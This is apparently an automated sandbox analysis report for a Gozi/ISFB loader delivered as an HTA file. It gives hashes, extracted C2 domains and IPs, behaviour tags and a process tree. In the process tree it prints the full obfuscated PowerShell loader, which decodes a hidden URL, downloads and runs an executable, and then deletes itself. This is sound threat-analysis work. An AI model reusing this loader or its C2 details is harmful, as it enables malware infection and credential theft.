Analysis
-
max time kernel
147s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system -
submitted
05-08-2022 01:33
Static task
static1
Behavioral task
behavioral1
Sample
55.hta
Resource
win7-20220715-en
General
-
Target
55.hta
-
Size
12KB
-
MD5
26ace4f34d7b5df03722125fe5280d4c
-
SHA1
7b9e7c2c60e66ec42061752d707ab70c3c84187a
-
SHA256
e49c5359656eedbca5bffe8ab5aada0e0b3301c47e426b028f27d6e89027adad
-
SHA512
5ad6cc4ae057d85a37f73b586ed0bbcf9857e7d918f302ba49772029d00bea6cb55d24f1249e33c0b2e05596fdaee813df0105032d96d91d56601b33b8555115
Malware Config
Extracted
gozi_ifsb
11111
trackingg-protectioon.cdn1.mozilla.net
194.76.225.168
194.76.224.242
-
base_path
/fonts/
-
build
250240
-
exe_type
loader
-
extension
.bak
-
server_id
50
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 25 876 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
bartor.exeWinZip.exepid process 4600 bartor.exe 2668 WinZip.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exebartor.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation bartor.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 876 powershell.exe 876 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exebartor.exedescription pid process Token: SeDebugPrivilege 876 powershell.exe Token: SeDebugPrivilege 4600 bartor.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
mshta.exepowershell.exebartor.execmd.execmd.exedescription pid process target process PID 4364 wrote to memory of 876 4364 mshta.exe powershell.exe PID 4364 wrote to memory of 876 4364 mshta.exe powershell.exe PID 4364 wrote to memory of 876 4364 mshta.exe powershell.exe PID 876 wrote to memory of 4600 876 powershell.exe bartor.exe PID 876 wrote to memory of 4600 876 powershell.exe bartor.exe PID 876 wrote to memory of 4600 876 powershell.exe bartor.exe PID 4600 wrote to memory of 4200 4600 bartor.exe cmd.exe PID 4600 wrote to memory of 4200 4600 bartor.exe cmd.exe PID 4600 wrote to memory of 4200 4600 bartor.exe cmd.exe PID 4200 wrote to memory of 2668 4200 cmd.exe WinZip.exe PID 4200 wrote to memory of 2668 4200 cmd.exe WinZip.exe PID 4200 wrote to memory of 2668 4200 cmd.exe WinZip.exe PID 4600 wrote to memory of 3448 4600 bartor.exe cmd.exe PID 4600 wrote to memory of 3448 4600 bartor.exe cmd.exe PID 4600 wrote to memory of 3448 4600 bartor.exe cmd.exe PID 3448 wrote to memory of 2200 3448 cmd.exe choice.exe PID 3448 wrote to memory of 2200 3448 cmd.exe choice.exe PID 3448 wrote to memory of 2200 3448 cmd.exe choice.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\55.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4364 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function EnIuqI($tUJRTxlOGTzBBb, $sVHQTsPPna){[IO.File]::WriteAllBytes($tUJRTxlOGTzBBb, $sVHQTsPPna)};function wteXJMZiCxLIHWyVK($tUJRTxlOGTzBBb){if($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32676,32684,32684))) -eq $True){rundll32.exe $tUJRTxlOGTzBBb }elseif($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32688,32691,32625))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $tUJRTxlOGTzBBb}else{Start-Process $tUJRTxlOGTzBBb}};function jLwXZBeGxQAjckUU($EnIuqI){$OVWWVDSjZvvguN=(bDbIUiomifraxsd @(32648,32681,32676,32676,32677,32686));$XHGthyalbeewKOEQPWZ=(Get-ChildItem $EnIuqI -Force);$XHGthyalbeewKOEQPWZ.Attributes=$XHGthyalbeewKOEQPWZ.Attributes -bor ([IO.FileAttributes]$OVWWVDSjZvvguN).value__};function hjUZSOEutRzDQjOlSx($ioMMScKpkah){$iHEFhbXBYCwXIirUfY = New-Object (bDbIUiomifraxsd @(32654,32677,32692,32622,32663,32677,32674,32643,32684,32681,32677,32686,32692));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$sVHQTsPPna = $iHEFhbXBYCwXIirUfY.DownloadData($ioMMScKpkah);return $sVHQTsPPna};function bDbIUiomifraxsd($DUtYcPEQU){$RsPcedMKJvyiH=32576;$qkuvmRDebHfQ=$Null;foreach($hGnJeoBRHGIJa in $DUtYcPEQU){$qkuvmRDebHfQ+=[char]($hGnJeoBRHGIJa-$RsPcedMKJvyiH)};return $qkuvmRDebHfQ};function RtvXhZhq(){$veIehdmMqql = $env:AppData + '\';$qitNbz = $veIehdmMqql + 'bartor.exe'; if (Test-Path -Path $qitNbz){wteXJMZiCxLIHWyVK $qitNbz;}Else{ $iplTNEkBLCQEiP = hjUZSOEutRzDQjOlSx (bDbIUiomifraxsd @(32680,32692,32692,32688,32634,32623,32623,32625,32633,32627,32622,32629,32630,32622,32625,32628,32630,32622,32625,32627,32625,32623,32674,32673,32690,32692,32687,32690,32622,32677,32696,32677));EnIuqI $qitNbz $iplTNEkBLCQEiP;wteXJMZiCxLIHWyVK $qitNbz;};jLwXZBeGxQAjckUU $qitNbz;;;;;}RtvXhZhq;2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:876 -
C:\Users\Admin\AppData\Roaming\bartor.exe"C:\Users\Admin\AppData\Roaming\bartor.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4600 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C start C:\Users\%UserName%\Downloads\WinZip.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4200 -
C:\Users\Admin\Downloads\WinZip.exeC:\Users\Admin\Downloads\WinZip.exe5⤵
- Executes dropped EXE
PID:2668 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 7 & Del "bartor.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:3448 -
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 75⤵PID:2200
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
494KB
MD50f2be4fe0362766dcf339d4c03326bc4
SHA169e26e9e75e8a8359d232d8e14318b9235e1a828
SHA2562f96d468f1c62104047e67e8dcd2a8590924e99f85f5c009f348f67bd83e2529
SHA5128d3d86dd98c04fea1a212be212b155dec3895fb88806c6bc460820635179ca3e9f60296cf448d3054fcccd38c311097395d108e6481aba5c60a6308d9b785150
-
Filesize
494KB
MD50f2be4fe0362766dcf339d4c03326bc4
SHA169e26e9e75e8a8359d232d8e14318b9235e1a828
SHA2562f96d468f1c62104047e67e8dcd2a8590924e99f85f5c009f348f67bd83e2529
SHA5128d3d86dd98c04fea1a212be212b155dec3895fb88806c6bc460820635179ca3e9f60296cf448d3054fcccd38c311097395d108e6481aba5c60a6308d9b785150
-
Filesize
338KB
MD5468042278a3e4841d3e33ccca10d99ca
SHA122532f37096a200d448420359c01bbebaaf6b820
SHA256b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86
SHA5124c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf
-
Filesize
338KB
MD5468042278a3e4841d3e33ccca10d99ca
SHA122532f37096a200d448420359c01bbebaaf6b820
SHA256b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86
SHA5124c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf